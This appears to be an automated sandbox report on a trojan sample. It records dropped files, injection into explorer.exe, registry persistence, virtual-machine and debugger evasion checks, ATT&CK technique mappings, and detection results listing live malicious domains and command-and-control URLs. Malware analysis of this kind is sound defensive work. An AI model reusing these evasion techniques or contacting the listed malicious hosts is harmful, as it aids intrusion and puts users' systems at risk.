      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ajjwvsd
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C9F5.tmp
      Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
      Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: file.exe ReversingLabs: Detection: 39%
      Source: file.exe Virustotal: Detection: 41%
      Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: unknown Process created: C:\Users\user\AppData\Roaming\ajjwvsd C:\Users\user\AppData\Roaming\ajjwvsd
      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9F5.exe C:\Users\user\AppData\Local\Temp\C9F5.exe
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe"
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe"
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
      Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
      Source: C:\Windows\explorer.exe Section loaded: webio.dll
      Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exe Section loaded: amsi.dll
      Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
      Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
      Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll
      Source: C:\Users\user\AppData\Roaming\ajjwvsd Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\ajjwvsd Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\ajjwvsd Section loaded: msvcr100.dll
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe Section loaded: wtsapi32.dll
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72eb61e0-8672-4303-9175-f2e4c68b2e7c}\InProcServer32
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.toxol:R;.gifex:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ajjwvsdUnpacked PE file: 4.2.ajjwvsd.400000.0.unpack .text:ER;.rdata:R;.data:W;.toxol:R;.gifex:W;.rsrc:R; vs .text:EW;
      Source: file.exeStatic PE information: section name: .toxol
      Source: file.exeStatic PE information: section name: .gifex
      Source: ajjwvsd.2.drStatic PE information: section name: .toxol
      Source: ajjwvsd.2.drStatic PE information: section name: .gifex
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CD1 push ecx; ret 0_2_00401CD2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401C91 push 00000076h; iretd 0_2_00401C93
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E96 push B92A2F4Ch; retf 0_2_00402E9B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B1D38 push ecx; ret 0_2_005B1D39
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B1CF8 push 00000076h; iretd 0_2_005B1CFA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B2EFD push B92A2F4Ch; retf 0_2_005B2F02
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F4E1 push edx; ret 0_2_0084F4E2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085155F push FFFFFFFBh; iretd 0_2_00851575
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401CD1 push ecx; ret 4_2_00401CD2
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401C91 push 00000076h; iretd 4_2_00401C93
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00402E96 push B92A2F4Ch; retf 4_2_00402E9B
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_0046FD51 push edx; ret 4_2_0046FD52
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00471DCF push FFFFFFFBh; iretd 4_2_00471DE5
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A1D38 push ecx; ret 4_2_005A1D39
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A1CF8 push 00000076h; iretd 4_2_005A1CFA
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A2EFD push B92A2F4Ch; retf 4_2_005A2F02
      Source: file.exeStatic PE information: section name: .text entropy: 7.472017406032608
      Source: ajjwvsd.2.drStatic PE information: section name: .text entropy: 7.472017406032608
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajjwvsdJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C9F5.exeJump to dropped file

      Boot Survival

      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ajjwvsd:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeFile Queried: C:\INTERNAL\__emptyJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: C:\Users\user\AppData\Roaming\ajjwvsdAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\AppData\Roaming\ajjwvsdAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: ajjwvsd, 00000004.00000002.2409281430.000000000045E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKC
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmnet.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmmouse.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 454Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1254Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 893Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3645Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5896Thread sleep time: -125400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4320Thread sleep time: -89300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5896Thread sleep time: -364500s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5077000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7D50771AFh7_2_00007FF7D5077000
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2105745637.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B092B mov eax, dword ptr fs:[00000030h]0_2_005B092B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B0D90 mov eax, dword ptr fs:[00000030h]0_2_005B0D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084936C push dword ptr fs:[00000030h]0_2_0084936C
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00469BDC push dword ptr fs:[00000030h]4_2_00469BDC
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A092B mov eax, dword ptr fs:[00000030h]4_2_005A092B
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A0D90 mov eax, dword ptr fs:[00000030h]4_2_005A0D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417B5E SetUnhandledExceptionFilter,Sleep,0_2_00417B5E
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00417B5E SetUnhandledExceptionFilter,Sleep,4_2_00417B5E

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exeFile created: C9F5.exe.2.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 211.202.224.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 1210000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 84C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 84E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory protected: C:\Windows\explorer.exe base: 1210000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 85019D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdThread created: unknown EIP: 85219D0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 1210000 value: 20Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 1211000 value: 48Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 84E0030 value: 00Jump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 1210000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 1211000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 84E0030Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DF310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,7_2_00007FF7D50DF310
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.2104592909.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

      Stealing of Sensitive Information

      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 841 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 72 Process Injection | 35 Virtualization/Sandbox Evasion | LSASS Memory | 35 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | Security Account Manager | 3 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 72 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 125 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
      [Behavior graph: ID: 1478859, Sample: file.exe, Start date: 23/07/2024, Architecture: WINDOWS, Score: 100]

      Source | Detection | Scanner | Label | Link
      file.exe | 39% | ReversingLabs | Win32.Trojan.BotX |
      file.exe | 41% | Virustotal | | Browse
      file.exe | 100% | Joe Sandbox ML | |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\C9F5.exe | 100% | Joe Sandbox ML | |
      C:\Users\user\AppData\Roaming\ajjwvsd | 100% | Joe Sandbox ML | |
      C:\Users\user\AppData\Roaming\ajjwvsd | 39% | ReversingLabs | Win32.Trojan.BotX |
      C:\Users\user\AppData\Roaming\ajjwvsd | 41% | Virustotal | | Browse

      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      gebeus.ru | 17% | Virustotal | | Browse
      evilos.cc | 18% | Virustotal | | Browse
      mussangroup.com | 14% | Virustotal | | Browse


      Source | Detection | Scanner | Label | Link
      https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
      https://powerpoint.office.comcember | 0% | URL Reputation | safe |
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe |
      https://api.msn.com/ | 0% | URL Reputation | safe |
      https://excel.office.com | 0% | URL Reputation | safe |
      http://schemas.micro | 0% | URL Reputation | safe |
      http://crl.v | 0% | URL Reputation | safe |
      https://outlook.com | 0% | URL Reputation | safe |
      https://word.office.comon | 0% | Avira URL Cloud | safe |
      https://mussangroup.com/wp-content/images/pic1.jpg | 100% | Avira URL Cloud | malware |
      https://107.173.160.139/ | 0% | Avira URL Cloud | safe |
      http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe |
      https://107.173.160.137/ | 0% | Avira URL Cloud | safe |
      http://cx5519.com/tmp/index.php | 100% | Avira URL Cloud | malware |
      http://www.autoitscript.com/autoit3/J | 0% | Virustotal | | Browse
      https://167.235.128.153/ | 0% | Avira URL Cloud | safe |
      https://107.173.160.139/ | 3% | Virustotal | | Browse
      http://gebeus.ru/tmp/index.php | 100% | Avira URL Cloud | malware |
      http://office-techs.biz/tmp/index.php | 100% | Avira URL Cloud | malware |
      http://www.oberhumer.com | 0% | Avira URL Cloud | safe |
      http://evilos.cc/tmp/index.php | 100% | Avira URL Cloud | malware |
      http://cx5519.com/tmp/index.php | 12% | Virustotal | | Browse
      http://gebeus.ru/tmp/index.php | 18% | Virustotal | | Browse
      https://mussangroup.com/wp-content/images/pic1.jpg | 6% | Virustotal | | Browse
